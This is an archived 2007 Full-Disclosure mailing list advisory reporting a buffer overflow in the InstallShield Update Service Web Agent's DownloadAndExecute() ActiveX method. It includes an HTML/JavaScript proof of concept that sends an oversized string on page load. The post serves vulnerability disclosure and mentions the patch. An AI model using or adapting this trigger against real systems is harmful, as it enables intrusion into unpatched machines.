[<prev] [next>] [day] [month] [year] [list]
Message-ID: <12326242.1198471521334.JavaMail.root@elwamui-royal.atl.sa.earthlink.net>
Date: Sun, 23 Dec 2007 23:45:21 -0500 (GMT-05:00)
From: Elazar Broad <elazarb@...thlink.net>
To: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>
Subject: Installshield Update Service isusweb.dll Buffer
Overflow
The InstallShield Update Service Web Agent version 5.1.100.47363 suffers from an
exploitable buffer overflow in the ProductCode parameter of the DownloadAndExecute()
function. This object is marked safe for scripting. Note that this issue appears to different
from http://www.securityfocus.com/bid/26280(the iDefense advisory seems to be talking about insecure methods), however, the patch referenced in that
issue fixes this issue as well since the update renders this object unsafe for scripting.
PoC as follows:
-----------------------
<!--
written by e.b.
-->
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = 'A';
while (s.length <= 12000) s = s + 'A';
obj.Initialize("", "", "", "");
obj.DownloadAndExecute("", s, 0, "", "");
}
</script>
</head>
<body onload="JavaScript: return Check();">
<object id="obj" classid="clsid:E9880553-B8A7-4960-A668-95C68BED571E"
/>
</object>
</body>
</html>
-----------------------
Elazar
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists